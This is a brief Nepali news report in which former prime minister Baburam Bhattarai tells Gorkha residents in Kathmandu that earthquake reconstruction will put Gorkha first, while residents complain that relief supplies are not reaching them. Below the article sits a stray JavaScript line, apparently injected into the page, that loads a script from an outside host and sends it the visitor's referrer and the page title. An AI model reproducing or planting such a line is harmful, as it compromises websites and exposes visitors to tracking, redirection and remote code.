एकीकृत नेकपा माओवादीका नेता एवं पूर्व प्रधानमन्त्री डाक्टर बाबुराम भट्टराईले सुरक्षित आवासका लागि अन्यत्र सार्ने लगायत सन्त्रासबाट बाहिर निस्कदै पुनःनिर्माणमा एकजुट हुन आग्रह गर्नुभएको छ। गोरखाबासिले शनिबार काठमाडौमा गरेको अन्तक्र्रिया कार्यक्रममा भट्टराईले जोखिमका रहेकालाई अस्थायी बसोबासमा सारिसकेपछि पुनःनिर्माणको योजना अघि बढ्ने र त्यस बखत गोरखालाई नै नमुनाको रुपमा लिएर अघि बढ्ने आश्वासन समेत दिनुभयो । उहाले भूकम्पपछिको भत्किएको संरचानको नवनिर्माण र पुनःनिर्माणको अभियान सुरु गर्दा गोरखालाई केन्द्रमा राखेर कार्य सुरु गरिनुपर्नेमा जोड दिनुभयो। कार्यक्रममा गोरखाबासीहरुले राहत सामाग्री नपुगेको भन्दै गुनासो गरेका थिए।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;